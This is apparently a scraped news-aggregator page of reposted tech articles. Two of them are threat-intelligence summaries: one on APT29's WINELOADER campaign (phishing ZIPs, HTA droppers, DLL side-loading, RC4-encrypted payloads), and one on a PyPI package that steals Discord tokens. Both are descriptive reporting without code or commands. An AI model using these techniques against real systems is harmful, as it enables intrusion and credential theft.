Weaponized Zip Files That Deliver WINELOADER Malware

andreasc
-
0
Weaponized Zip Files That Deliver WINELOADER Malware
[ad_1]

APT29, a Russian threat group, targeted German political parties with a new backdoor called WINELOADER using spear-phishing emails containing malicious links to ZIP files hosted on compromised websites.

The ZIP files deployed an HTA that initiated a multi-stage infection chain, delivering WINELOADER. 

The backdoor has functionalities for communication with command and control servers and utilizes evasion techniques.

To defend against the APT29 campaign, security teams should understand these TTPs and the WINELOADER backdoor to improve detection capabilities. 

APT29 uses spear-phishing emails with a malicious PDF attachment disguised as a wine-tasting invitation. The PDF tricks the victim into downloading a ZIP file containing an HTA (wine.hta or invite.hta). 

Attack Chain

The HTA uses obfuscated JavaScript (potentially obfuscated with obfuscator.io) to download and execute a legitimate but vulnerable Microsoft binary (sqlwriter.exe or sqldumper.exe) along with a malicious DLL (vcruntime140.dll), which is side-loaded by the legitimate binary establishes the initial foothold for the WINELOADER infection. 

Free Webinar | Mastering WAAP/WAF ROI Analysis | Book Your Spot

The Splunk Threat Research Team created an Atomic Red Team test to simulate the initial access of the WINELOADER campaign, excluding the data exfiltration tools, which involve an HTA triggering a base64 decoded payload (invite.zip) containing a DLL (gup.exe). 

It mimics the side-loading behavior but uses a non-malicious DLL and to further emulate real-world attacks, the test injects sqlwriter.exe within a benign vcruntime140.dll. 

Security teams can evaluate their capacity to identify these APT29 TTPs by running and analyzing this test, which will enable them to improve their analytics, response processes, and overall security posture.  

malicious .HTA

The HTA file exploits a DLL side-loading vulnerability. It first writes the Base64-encoded content of a malicious ZIP file (invite.zip) to a text file (invite.txt) on the system, then decodes the text file back to a ZIP and extracts its contents. 

It triggers a user prompt, “Are You Ready?” before executing the payload, likely a malicious DLL named gup.exe and if the user clicks “OK,” the DLL is loaded and likely spawns calc.exe as a test.

A final message box confirms successful DLL side-loading with the Atomic logo. 

Simulation Attack

WINELOADER exploits legitimate applications like SQLWriter.exe or Sqldumper.exe through DLL side-loading by loading a malicious vcruntime140.dll that triggers code execution. 

The code decrypts a hidden data block using the RC4 algorithm with a key stored within the malicious DLL itself, allowing WINELOADER to gain initial functionality on a compromised system. 

One of the RC4 Key

Researchers analyzed a malicious DLL file (vcruntime140.dll) containing a variant of WINELOADER malware, which is encrypted with the RC4 algorithm and hides critical components like API names and strings to avoid detection

C2, User Agent & Landing Page

After decryption, the malware connects to its command and control server (C2) and downloads additional malicious components.

The report provides the C2 server addresses and user-agent strings used by the malware. 

Looking to Safeguard Your Company from Advanced Cyber Threats? Deploy TrustNet to Your Radar ASAP.  


[ad_2]
Source link

Galaxy Tab S7, A32, A23 & more grab Samsung’s April update

andreasc
-
0
Galaxy Tab S7, A32, A23 & more grab Samsung’s April update
[ad_1]

Samsung continues to expand its April 2024 security update to more Galaxy devices. It recently released the new security patch for the Galaxy Tab S7 series, Galaxy A32, Galaxy A23, Galaxy A12 Nacho, and Galaxy M54. The company has already updated all eligible flagship models globally.

April update rolling out to the Galaxy Tab S7 series

Launched in August 2020, the Galaxy Tab S7 series is in its final year of official software support. The aging flagship tablets have already stopped getting feature updates (didn’t get Android 14 or One UI 6.0) but security patches are still coming once in a while. Samsung is now rolling out the latest SMR (Security Maintenance Release) to the devices.

The April update for the Galaxy Tab S7 and Galaxy Tab S7+ is rolling out in Europe and Latin America, SamMobile reports. The firmware build number for the tablets ends with DXD1. Samsung should soon expand the rollout to other markets. The update brings over 40 security fixes part of the latest SMR. There aren’t any other changes.

The same security fixes are also rolling out to the Galaxy A32 (4G). The update is currently available in the Caribbean region with the build number A325MUBS7DXD1. This phone is also no longer eligible for feature updates (received Android 12 and Android 13), so the update is all about the latest SMR. Its 5G version has yet to pick up the April patch.

As far as the Galaxy A23 is concerned, both 4G and 5G versions are picking up the April SMR. The rollout for the former has begun in Samsung’s homeland South Korea. Users are getting the update with the firmware version A235NKSS4DXD1. For the 5G model, the update is available in Europe with the build number A236BXXU5DXD6.

The Galaxy A23 is eligible for the One UI 6.1 update. However, the latest release doesn’t seem to bring it, though the build version suggests the update isn’t all about the April security patch. Maybe there are some additional bug fixes in tow. The device should receive One UI 6.1 in a month or two. Don’t expect to get the new AI features from the Galaxy S24 series, though.

Galaxy A12 Nacho and M54 are also getting these security fixes

Samsung is also updating the Galaxy A12 Nacho and Galaxy M54 to the April security patch. The former is picking up the new SMR in Asia with firmware version A127FXXSBDXD2. The latter is getting it in Latin America with the build number M546BXXS4BXD1. The Galaxy M54 may receive One UI 6.1 but the Galaxy A12 Nacho is done getting feature updates.


[ad_2]
Source link

Microsoft’s VASA-1 can create lifelike talking faces

andreasc
-
0
Microsoft’s VASA-1 can create lifelike talking faces
[ad_1]

At this point, it’s safe to say that AI technology is advancing at a rapid Pace. Microsoft is one of the leading companies in AI with the help of OpenAI. Well, Microsoft’s latest tool is called VASA-1, a powerful tool to generate lifelike talking faces that work in real-time.

This is evidence of AI’s growing ability to mimic human beings based on minimal input. For example, TikTok is working on a tool that will let people make an AI-generated clone of their voice with only 10 seconds of audio input. At the time of writing this article, this tool is not available to the public. However, we expect it to be coming out relatively soon.

Microsoft’s VASA-1 allows users to create lifelike talking faces in real time

We’ve seen examples of this through hundreds of advertisements of apps that let you animate a portrait to make it seem like you’re singing a Billie Eilish song. However, the technology behind VASA-1 is much more advanced and much more refined. You’re able to use a singular picture for this tool. Using this picture, the tool will be able to generate realistic movement to make it appear that the person is speaking.

This is impressive as is, but it goes further than that. VASA-1 can actually create subtle facial movements and convey a wide range of emotions. This is something that has been lacking with similar tools over the years. Its main focus is realism, and it gets really close to that.

The company showed off a few examples of this technology on its website, and it’s very impressive. Aside from that, talking faces can lip-sync to audio in real-time. That’s another great quality of this tool.

Microsoft VASA-1 can generate 512×512 videos at up to 40FPS. Also, on its online streaming mode, Microsoft boasts a latency of only 170ms.

At this point, we don’t know when Microsoft plans on releasing this feature to the masses.  However, when it does, we’re pretty sure that Microsoft will monetize it. It could possibly be a feature in one of the company’s subscription services. We will have to wait for it to come out in order to be sure.


[ad_2]
Source link

Pixel phone giveaway in #STEMTok competition amid TikTok US ban threat

andreasc
-
0
Pixel phone giveaway in #STEMTok competition amid TikTok US ban threat
[ad_1]

TikTok might face a ban in the US after the latest House vote, but let’s put politics aside.

Right now, TikTok offers users a chance to win a Google Pixel phone (not specified which exact model, but, hey, it certainly won’t be the Pixel 3a from 2019) by participating in the first STEM competition on TikTok.

STEM stands for science, technology, engineering, and math.

To participate in the challenge, students aged 13-21, and teachers of all kinds, are encouraged to submit their best STEM communication video on TikTok’s STEM feed using the hashtag #STEMTok.

The competition kicks off on Earth Day, April 22 and will finish on May 31

Here’s your participation guide:

  • Make a STEM-related video using the hashtag #StemTok explaining any STEM topic of your choice.
  • Introduce yourself! Share your expertise or interest in STEM (e.g., “I’m a student,” “I’m a teacher,” “I’m a chemist,” “I’m passionate about nature,” etc.).
  • Dive into the explanation of your chosen STEM topic with clarity and enthusiasm.
  • Conclude your video with a bang!
  • Upload your video to TikTok, ensuring you use the hashtag #STEMTok.
  • Make sure to post your video between April 22 and May 31 to qualify for the competition.
  • The EXPLR account will judge the videos and grant a Google Pixel to winners each week during the competition!

TikTok’s team says that in the US, 33% of TikTok’s community already actively engages with STEM content through their dedicated feed. After over 50,000 users signed-up to watch the exclusive stream of the National STEM Festival, TikTok LIVE will stream STEM-related content for seven weeks during the contest. This will serve to amplify the STEM contest and expand the audience engaging in STEM content on the platform. There are nearly 15 million STEM-related videos published globally since 2021 on TikTok.

Here’s what an EXPLR representative has to say about the competition:

We are thrilled to organize and judge a STEM competition on TikTok. Our mission is to provide young talents with a platform to display their brilliance and enthusiasm for STEM education. With TikTok hosting this competition for young people and parents, we have a great ally to help reach audiences eager to express their creativity and passion for STEM content. Together, we aim to create a dynamic and engaging space for showcasing the potential of the next generation in STEM fields.


[ad_2]
Source link

Malicious PyPI Package Attacking Discord Users

andreasc
-
0
Malicious PyPI Package Attacking Discord Users
[ad_1]

Hackers often target PyPI packages to exploit vulnerabilities and inject malicious code into widely used Python libraries.

Recently, cybersecurity researchers at FortiGuard Labs identified a malicious PyPI package attacking Discord users to steal credentials.

The malicious PyPI package that was discovered is described as “discordpy_bypass-1.7,” published on March 10th, 2024, and detected on March 12, 2024.

discordpy_bypass-1.7 (Source – Fortinet)

The package, authored by Theaos and consisting of seven versions with almost similar characteristics, is intended to obtain sensitive information from the victims via persistence techniques, browser data extraction, and token harvesting.

Technical Analysis

The discordpy_bypass-1.7 PyPI package demonstrates persistent cyber-attacks by using malicious behavior designed to take sensitive data from user systems through code obfuscation and evasion techniques against analysis environments.

Free Webinar | Mastering WAAP/WAF ROI Analysis | Book Your Spot

This code employs different checks to detect and quit itself when it runs in a debug or analysis environment, showing attempts to avoid detection.

The coding involves three levels of obfuscation:-

  • base64 encoding the original Python code
  • Encoding with obfuscation techniques
  • Compilation into an executable fetched from a remote URL by discordpy_bypass/discordpy_bypass.py

The code also contains debugging environment detection techniques like checking for blacklisted processes, and the system IP/MAC addresses are compared against blocklists.

Block listed IPs and MACs (Source – Fortinet)

This makes it critical for people to be alert right from the beginning and take initiative regarding such threats.

FortiGuard said that to detect debugging environments; the code quickly checks the system username, hostname, and hardware ID against some blocklists.

Initializing variables and setting up Socket.IO events for remote control and monitoring enable actions such as file operations, directory navigation, and command execution.

Authentication tokens, especially from Discord, are the target for harvesting sensitive browser data such as login credentials, cookies, and web history.

Before uploading them to a remote server, it also decrypts and validates any extracted tokens.

The discordpy_bypass-1.7 code is a smart and stealthy cyber threat that aims to steal crucial system data quietly by using evasive measures to avoid detection and analysis.

This artful “costume” points out online threats and the necessity of being alert and having strong protections in place.

With knowledge of such threats, researchers can design more secure systems to enhance personal information and general safety for users through joint vigilance and cooperation.

Looking to Safeguard Your Company from Advanced Cyber Threats? Deploy TrustNet to Your Radar ASAP.


[ad_2]
Source link

Galaxy S24 FE launch may be delayed to late 2024 or early 2025

andreasc
-
0
Galaxy S24 FE launch may be delayed to late 2024 or early 2025
[ad_1]

Samsung‘s next Fan Edition (FE) smartphone, the Galaxy S24 FE, may be slightly delayed. Current developments suggest the device will arrive late in 2024 or early 2025. The company launched the Galaxy S23 FE in October last year.

Galaxy S24 FE may arrive later than expected

Samsung has yet to give its FE lineup a fixed launch schedule like the Galaxy S flagships and Galaxy Z foldables. New S series models arrive early in the year, while foldables are refreshed in July or August. We cannot say the same for the FE lineup. The Galaxy S20 FE, the first model in this series, debuted in September 2020. Samsung followed up with the Galaxy S21 FE in January 2022.

We never got a Galaxy S22 FE, while the Galaxy S23 FE arrived in October 2023. Ideally, the Galaxy S24 FE should debut in September or October this year. However, there is little chance of that happening. The rumor mill has yet to churn out a lot of information about the phone, suggesting that it is in a very early stage of development. As such, the launch may be delayed to late 2024.

According to GalaxyClub, Samsung could even push the Galaxy S24 FE to an early 2025 release. The publication says the company is developing the device under the codename R12, which is in line with previous models in the lineup—the Galaxy S23 FE was R11, Galaxy S21 FE was R9, and Galaxy S20 FE was R8 (which means the canceled Galaxy S22 FE was R10).

This is all we know about the Galaxy S24 FE today. Rumors have hinted at beefy specs (more on that later) but not many credible sources have backed those. What we can say for sure is that Samsung has a new FE phone in the pipeline. Unless the company changes its mind in the coming months, the device will see the light of day later this year or early 2025. We will keep you posted.

Rumored specs hint at a solid phone

An X tipster recently shared the alleged key specs of the Galaxy S24 FE. While we can’t vouch for the authenticity of the specs, they certainly hint at a solid phone. The device will reportedly feature the Snapdragon 8 gen 3 or Exynos 2400, the same chipset that powers the Galaxy S24 flagships. Samsung plans to offer up to 256GB of UFS 4.0 storage, up to 12GB of LPDDR5X RAM, and a 4500mAh battery, likely with 25W charging. More details are awaited.


[ad_2]
Source link

Chrome for Android’s Quick Delete feature is heading to iOS

andreasc
-
0
Chrome for Android’s Quick Delete feature is heading to iOS
[ad_1]

Android users looking to quickly delete their browsing history on Chrome can tap the three-dot menu in the upper right corner of the display and tap on Clear browsing data. This allows the user to clear their browsing history from the last 15 minutes or longer. Tapping on the small arrow next to where the Clear browsing data box says “Last 15 minutes” opens a small menu allowing you to change the time frame to clear your browsing data from 15 minutes to the last hour, last 24 hours, last 7 days, last 4 weeks, and all time.

Tapping the blue “Clear data” pill on the bottom right of the screen will remove from the app the sites you’ve visited over the time period that you’ve selected. If you don’t want to leave your most recent browsing history in the open where it can be easily viewed by someone taking physical possession of your phone, Android users might want to make it a regular habit to clear their Chrome browsing data using the 15-minute option

Currently, Chrome users on iOS cannot erase their browsing history over less than 1 hour - Chrome for Android's Quick Delete feature is heading to iOS

Currently, Chrome users on iOS cannot erase their browsing history over less than 1 hour

Currently, the option to erase the last 15 minutes of browsing history has been limited to the Android version of the Chrome app. Those using the iOS version of Chrome can’t delete anything less than the last hour of data but this is going to change according to The Mac Observer. The latter says that a Chrome flag titled “Quick Delete for iOS” is being added although it currently is not listed. The description of the flag will read, “Enables a new way for users to more easily delete their browsing history in iOS.”
An upcoming Chrome flag for iOS reveals the upcoming 15-minute Quick Delete for iOS - Chrome for Android's Quick Delete feature is heading to iOS

An upcoming Chrome flag for iOS reveals the upcoming 15-minute Quick Delete for iOS

To clear your browsing history on the iOS version of Chrome, open the app and tap the three-button menu on the bottom right of the screen. Tap on Clear Browsing Data. To select the time period you want cleared, tap the Time Range button near the top of the screen and choose from Last Hour, 24 Hours, Last 7 days, Last 4 weeks, and All Time. Once you’ve selected a time range, hit the back button on the upper left corner, and from the Clear Browsing Data screen, make sure the time range has the time you selected and at the bottom of the page, tap on the red “Clear Browsing Data” link.

Interestingly, iOS users can remove the last 15 minutes of Search history from the iOS Google app, so it seems like adding a 15-minute option to clear the browsing data on the iOS version of Chrome seems like a sure thing.


[ad_2]
Source link

Hackers Group Claims To Have Broke Into IDF

andreasc
-
0
Hackers Group Claims To Have Broke Into IDF
[ad_1]

Anonymous claims a successful cyberattack against the Israeli Defence Force (IDF), gaining access to 20 gigabytes of data, which allegedly includes over 233,000 military documents in various formats, like PDFs, Word files, and presentations. 

The IDF considers the authenticity of the claim dubious and suspects a psychological warfare tactic.

They reason that their layered, secure computer systems were likely not breached directly, and if a breach did occur, they suspect it compromised civilian systems instead. 

Hackers released a video containing purportedly genuine excerpts from IDF presentations, but the IDF dismisses this as a possible psychological warfare tactic, casting doubt on the authenticity of the material. 

The IDF emphasizes the robustness of its computer systems, which are secured with multiple layers of protection, which makes it highly unlikely that the hackers breached the IDF’s core network directly. 

If any IDF information was compromised, it was more likely due to unauthorized access to civilian systems, potentially in violation of IDF regulations.

Earlier this month, a group affiliated with the loose-knit hacktivist collective Anonymous allegedly launched a cyberattack against the Justice Ministry’s IT infrastructure, where the attackers claim to have breached the ministry’s defences and exfiltrated a massive dataset exceeding 300 gigabytes in size. 

This data dump reportedly contains 8 million files, potentially including sensitive personal information.

The group’s motivations remain unclear, but some members have expressed anti-Israeli sentiment, possibly linking the attack to a broader geopolitical agenda.

A computer screen with a red security alert warning.

According to Jerusalem, the national cyber authority issued a warning about a surge in cyberattacks following Ramadan, and the attacks are expected to target Israel and its online infrastructure. 

Potential threats include website breaches, infiltration of digital systems (including smart homes), and leaks of sensitive data.

Hackers might also deploy tracking software and attempt unauthorized access to systems, potentially for purposes of espionage or disruption.

Looking to Safeguard Your Company from Advanced Cyber Threats? Deploy TrustNet to Your Radar ASAP.


[ad_2]
Source link

Post News, a Twitter alternative is shutting down

andreasc
-
0
Post News, a Twitter alternative is shutting down
[ad_1]

In the fast-paced world of social media apps, the rise and fall of new contenders are all too common. One such platform, Post News, emerged as a potential rival to Twitter with its unique features and innovative approach to content consumption. However, despite the initial buzz and backing from venture capital firm Andreessen Horowitz, Post News has now announced its impending closure.

The rise and fall of Post News

Post News made waves in the social media scene when it launched in a closed beta phase in November 2022. The platform offered users ad-free access to premium content from top publishers for a small fee per article, setting it apart from traditional social networks. With the support of Andreessen Horowitz, excitement surrounding Post News reached a peak as it garnered over 430,000 users following the waitlist’s removal in early 2023.

post news shut down

Challenges and setbacks

Despite early signs of success, Post News struggled to achieve the necessary growth to sustain itself as a viable business. Noam Bardin, the platform’s visionary and former Waze CEO, acknowledged the difficulties in a statement, citing the failure to capture widespread consumer adoption as a key factor in the decision to shut down. The platform’s commendable efforts to foster a positive community and meaningful engagement were not enough to overcome the challenges it faced.

Lessons learned and moving forward

As Post News prepares to close its doors on May 31st, users are encouraged to download their posts and settle any remaining balances on the platform. The closure serves as a reminder of the fierce competition and ever-changing landscape of the tech industry, where even well-funded ventures can struggle to stay profitable. However, as Post News bows out, other social media platforms like Mastodon, Bluesky, and Meta’s Threads continue to evolve and offer users new experiences.

While Post News may be a cautionary tale, the tech industry’s spirit of innovation and resilience lives on. As platforms come and go, the quest for the next transformative social experience persists, driven by the creativity and determination of creators and users alike. Although Post News may be shutting down, the ever-changing world of social media will continue to evolve, offering new opportunities and challenges for those willing to venture into its realm.


[ad_2]
Source link

Tinder wants your mom to know when and where you go on dates

andreasc
-
0
Tinder wants your mom to know when and where you go on dates
[ad_1]
According to Tinder, around 51 percent of users under 30 share date details with their friends, while 19 percent of users do so with their mom. The company wants to streamline the process with a new feature that will allow users to quickly and easily share details about their upcoming date through a single link.The new feature is called Share My Date, and it generates a link pointing to details about your planned date. These include the date, time, and location of the event, along with a picture of the person you’re meeting and a link to their profile. You can also add personal notes, such as “this could be the one” or “call the police if I’m not back by 8 p.m.”

All (mom) jokes aside, this obviously aims to give Tinder users an extra layer of safety. It’s good to let somebody know that you’re going to meet a stranger. For the players out there, there’s no limit on the number of shareable URLs you can create with the new feature, and you can set these in the app up to 30 days in advance.

This isn’t the first feature of this kind on a dating app or service. Back in 2020, the site Match.com introduced a similar “check-in” feature that let users send details about their date to designated emergency contacts if things were going south.

But it’s not dating apps alone that care about your whereabouts. Back in 2022, Google introduced a location sharing feature in Maps, notifying you when a friend or family member has shown up or left a place.

The new Share My Date feature will be rolled out over the coming months. It’ll be available in the US, UK, Australia, Canada, Singapore, India, Ireland, Germany, France, Spain, Japan, Brazil, Switzerland, Mexico, the Netherlands, Italy, Korea, Vietnam, and Thailand. What do you think about it? Would you use it just to be extra safe? And since we’re talking about it, can you share the weirdest Tinder date experience you’ve had?


[ad_2]
Source link
1...152153154...1,452Page 153 of 1,452